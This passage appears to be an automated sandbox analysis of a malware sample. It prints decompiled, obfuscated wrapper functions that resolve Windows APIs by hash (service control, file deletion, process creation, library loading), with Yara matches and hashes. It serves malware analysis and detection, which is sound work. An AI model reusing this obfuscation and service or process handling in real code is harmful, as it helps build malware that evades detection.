                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: e7037390f7e7bacdf7c2bd971d6ce7ccbf9953c3af2e8e0c38516eaa01a5caa6
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 28014BB190120CFFEB09DFA4C84A8DEBBB9EF54314F208199F405A7240EBB15F509B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E001DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E001D602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E001E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                              				return _t29;
                                              			}









                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001DF6D8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 25db9c83cd685e5ff74837f7b26bcfb941d860824d8c17e223a5a90ae44bee76
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 7F01E5B6901208BFEF059F94DC468DF7F75EB19324F148188F90462250D7B25E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E001DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t23;
                                              				intOrPtr* _t27;
                                              				void* _t28;
                                              
                                              				E001D602B(_t23);
                                              				_v12 = 0x9431;
                                              				_v12 = _v12 >> 7;
                                              				_v12 = _v12 ^ 0x0000160f;
                                              				_v8 = 0xc972;
                                              				_v8 = _v8 ^ 0x829e0126;
                                              				_v8 = _v8 + 0x4512;
                                              				_v8 = _v8 + 0xffff18f9;
                                              				_v8 = _v8 ^ 0x829e24c1;
                                              				_t27 = E001E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                              				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                              				return _t28;
                                              			}









                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001DB759
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 4e94c54c4c2e972598a0f63784df660732168030f90fb273d613f908c69640ee
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: DF0128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E001D602B(_t21);
                                              				_v12 = 0xcc49;
                                              				_v12 = _v12 << 6;
                                              				_v12 = _v12 >> 2;
                                              				_v12 = _v12 ^ 0x000ca988;
                                              				_v8 = 0x5d85;
                                              				_v8 = _v8 | 0xb9d19a55;
                                              				_v8 = _v8 * 0xd;
                                              				_v8 = _v8 ^ 0x6fa87272;
                                              				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                              				_t27 = DeleteFileW(_a12); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001EAAA8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t21;
                                              				int _t27;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E001D602B(_t21);
                                              				_v12 = 0x33d;
                                              				_v12 = _v12 + 0xc3dc;
                                              				_v12 = _v12 | 0x39ccfb02;
                                              				_v12 = _v12 ^ 0x39ccf342;
                                              				_v8 = 0xe8d9;
                                              				_v8 = _v8 * 0x16;
                                              				_v8 = _v8 | 0x4145347f;
                                              				_v8 = _v8 ^ 0x9035ef96;
                                              				_v8 = _v8 ^ 0xd1609914;
                                              				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                              				_t27 = CloseServiceHandle(_a4); // executed
                                              				return _t27;
                                              			}








                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                              • Associated: 0000000A.00000002.2114486408.00000000001D0000.00000004.00000001.sdmp
                                              • Associated: 0000000A.00000002.2114569444.00000000001EC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Executed Functions

                                              C-Code - Quality: 62%
                                              			E004B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E004B602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E004C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}










                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 004B29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 06e9d43b6f3b5c25e848dd7324d8f7c4e00a6a07bfeeab89d847c5a6a7e7eea5
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: E3015B72A01108BBEB18DF95DC0A8DFBFB6EF44310F108099F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E004BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E004B602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E004C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}













                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 004BC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: dbc117d9dee57b0571df33964465c770a4b78adf50b388f2044d157d9ce9a555
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 141122B290122DBBCB25DF95DC498DFBEB8EF04714F108188B90962210D3754A659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E004B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E004B602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E004C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 004B1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 69f0356ebac370d937dbdb1450612bc80795ee69c6fda0e125475a12bab41ae0
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: E0016DB6D0130CFBDF04DF94C94AADEBBB1EF54318F10818CE41466291D3B59B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004B4859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
                                              				_v12 = _v12 * 0x42;
                                              				_v12 = _v12 + 0xffffdd89;
                                              				_v12 = _v12 ^ 0x002d198d;
                                              				_v8 = 0x5b09;
                                              				_v8 = _v8 | 0xa1ea9544;
                                              				_v8 = _v8 * 0x12;
                                              				_v8 = _v8 ^ 0x6283d9c1;
                                              				E004C07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                              				ExitProcess(0);
                                              			}







                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 004B48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 60ec550acc5e9f3fded07c341001b7ac3d4c8e4adfe62b528d6c4a0a3540f53b
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 53F017B0A05209FBDB48CFE8CA56A9EBFB9EB40305F20819DE444B7290E3B15F509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 66%
                                              			E004C4F7D(void* __ecx, void* __edx, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t17;
                                              				int _t24;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E004B602B(_t17);
                                              				_v12 = 0xddd8;
                                              				_v12 = _v12 * 0x48;
                                              				_v12 = _v12 ^ 0x003e66d8;
                                              				_v8 = 0xcb35;
                                              				_v8 = _v8 ^ 0x7b88573c;
                                              				_v8 = _v8 * 0x59;
                                              				_v8 = _v8 ^ 0xf27e4a21;
                                              				E004C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                              				_t24 = CloseHandle(_a4); // executed
                                              				return _t24;
                                              			}








                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 004C4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 3c8013a9c9bb3574230be50aecd2342c7c6208b26763d49484c52de2396c872a
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 61F037B081120CFFDF08EFA5D94289EBFBAEB40304F20819DE804AB250D3715B509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 21%
                                              			E004C976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t34;
                                              				int _t39;
                                              				struct _PROCESS_INFORMATION* _t48;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_t48 = __edx;
                                              				_push(0);
                                              				_push(_a68);
                                              				_push(0);
                                              				_push(_a60);
                                              				_push(_a56);
                                              				_push(_a52);
                                              				_push(0);
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(0);
                                              				_push(0);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(_a20);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E004B602B(_t34);
                                              				_v12 = 0xaff9;
                                              				_v12 = _v12 | 0xcee54bd1;
                                              				_v12 = _v12 + 0x6ed6;
                                              				_v12 = _v12 ^ 0xcee61221;
                                              				_v8 = 0x6229;
                                              				_v8 = _v8 ^ 0x42aa9f31;
                                              				_v8 = _v8 >> 2;
                                              				_v8 = _v8 ^ 0x10aad83f;
                                              				E004C07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                              				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                              				return _t39;
                                              			}









                                              APIs
                                              • CreateProcessW.KERNEL32(004B591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,004B591A), ref: 004C9816
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: 710513b77a099025bd463c025ad843cb800bd04d11b1b37a1c645c9d49785139
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: E711D072801188FBDF1A9F92DC0ACDF7F3AEF89750F108048FA1452120D2768A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 31%
                                              			E004BB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t32;
                                              				void* _t38;
                                              				long _t47;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a48);
                                              				_t47 = __edx;
                                              				_push(_a44);
                                              				_push(_a40);
                                              				_push(_a36);
                                              				_push(_a32);
                                              				_push(_a28);
                                              				_push(_a24);
                                              				_push(0);
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(0);
                                              				E004B602B(_t32);
                                              				_v8 = 0xfd14;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 * 0x7a;
                                              				_v8 = _v8 >> 9;
                                              				_v8 = _v8 ^ 0x00002bef;
                                              				_v12 = 0x4f26;
                                              				_v12 = _v12 | 0xe7e97f76;
                                              				_v12 = _v12 ^ 0xe7e94dbb;
                                              				E004C07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                              				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                              				return _t38;
                                              			}









                                              APIs
                                              • CreateFileW.KERNELBASE(004C0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,004C0668,?,?,?,?), ref: 004BB5FD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 773bfd9854294777500840f35b6a665c8c88e842aad04c309bfbb920b5262662
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 5411E232801208BBDF16DF95DD06CEE7F7AEF89314F108198FA1862120D3769A20EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 54%
                                              			E004C981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              				void* _t28;
                                              				void* _t34;
                                              				long _t37;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a16);
                                              				_t34 = __edx;
                                              				_t37 = __ecx;
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E004B602B(_t22);
                                              				_v12 = 0xe68;
                                              				_v12 = _v12 * 0x39;
                                              				_v12 = _v12 ^ 0xd1b1d871;
                                              				_v12 = _v12 ^ 0xd1b2fb7e;
                                              				_v8 = 0x629e;
                                              				_v8 = _v8 + 0xfffff5da;
                                              				_v8 = _v8 | 0xbef7b77b;
                                              				_v8 = _v8 ^ 0xbef79fc3;
                                              				E004C07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                              				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                              				return _t28;
                                              			}










                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,004B87F2,0000CAAE,0000510C,AD82F196), ref: 004C989B
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: b546705c803b88a60c6eb6c240abbc21ff7c1027c5a6cc7093fdb842c85d19af
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 56014876801208FBDB08EF95D846CDFBF79EF85750F10819DF918A6220E6715A619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E004C7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				int _t31;
                                              				signed int _t33;
                                              				struct _SHFILEOPSTRUCTW* _t40;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a12);
                                              				_t40 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E004B602B(_t24);
                                              				_v8 = 0xa117;
                                              				_t33 = 0x76;
                                              				_v8 = _v8 / _t33;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 ^ 0x210fe703;
                                              				_v8 = _v8 ^ 0x210fdcea;
                                              				_v12 = 0xf1e9;
                                              				_v12 = _v12 << 9;
                                              				_v12 = _v12 ^ 0x01e3a445;
                                              				E004C07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                              				_t31 = SHFileOperationW(_t40); // executed
                                              				return _t31;
                                              			}










                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 004C7C67
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, Offset: 004B0000, based on PE: true
                                              • Associated: 0000000B.00000002.2115890642.00000000004B0000.00000004.00000001.sdmp
                                              • Associated: 0000000B.00000002.2115942170.00000000004CC000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 70381a5a462efdaaed293b554f2092b78ec6d1e9f5a9197df594307d4a575fd7
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 34014BB590120CFFEB09DFA4C84A9DEBBB9EF44314F20819DF405A7240EAB55F509B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 52%
                                              			E004BF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t24;
                                              				void* _t29;
                                              				int _t35;
                                              
                                              				_push(__ecx);
                                              				_push(__ecx);
                                              				_push(_a20);
                                              				_t35 = __ecx;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E004B602B(_t24);
                                              				_v12 = 0xd5a7;
                                              				_v12 = _v12 ^ 0x994cba9d;
                                              				_v12 = _v12 ^ 0x994c19d3;
                                              				_v8 = 0xac88;
                                              				_v8 = _v8 << 3;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 + 0xebed;
                                              				_v8 = _v8 ^ 0x0000ab82;
                                              				E004C07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                              				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
